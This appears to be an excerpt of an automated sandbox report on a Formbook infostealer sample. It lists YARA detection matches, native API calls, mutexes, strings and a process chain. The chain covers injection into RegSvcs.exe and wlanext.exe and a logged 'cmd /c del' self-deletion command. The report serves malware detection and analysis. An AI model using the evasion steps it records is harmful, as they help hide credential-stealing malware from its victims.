          Source: Yara matchFile source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004181B0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418260 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182E0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004181AA NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041825A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182DA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEAD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE96D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03308390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03308260 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033082E0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033081B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330825A NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033082DA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_033081AA NtCreateFile,
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_00E55871
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_00E559CA
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_00E55998
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_00E56501
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_0310B15C
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_0310C428
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_03109890
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_0310DE90
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_0310FD5F
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_0310FD70
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D4418
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D6EF8
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D6B70
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057DA608
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D8091
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D8318
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D6F50
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_057D6F95
          Source: C:\Users\user\Desktop\00098765123POIIU.exeCode function: 0_2_00E53C88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00401026
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BA6D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041B4B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C773
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BFFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010720A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010728EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01072B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010603DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010722AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01072D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01071D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010725DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01071FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01072EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330C773
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F2D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F8C4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_032F8C50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0330B4B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FAB150 appears 45 times
          Source: 00098765123POIIU.exe, 00000000.00000002.337981677.0000000003303000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exe, 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exe, 00000000.00000002.339649997.0000000004378000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exeBinary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
          Source: 00098765123POIIU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00098765123POIIU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@14/8
          Source: C:\Users\user\Desktop\00098765123POIIU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMutant created: \Sessions\1\BaseNamedObjects\niuhQPClXbX
          Source: 00098765123POIIU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\00098765123POIIU.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\00098765123POIIU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: 00098765123POIIU.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\00098765123POIIU.exeFile read: C:\Users\user\Desktop\00098765123POIIU.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\00098765123POIIU.exe 'C:\Users\user\Desktop\00098765123POIIU.exe'
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\00098765123POIIU.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 00098765123POIIU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 00098765123POIIU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
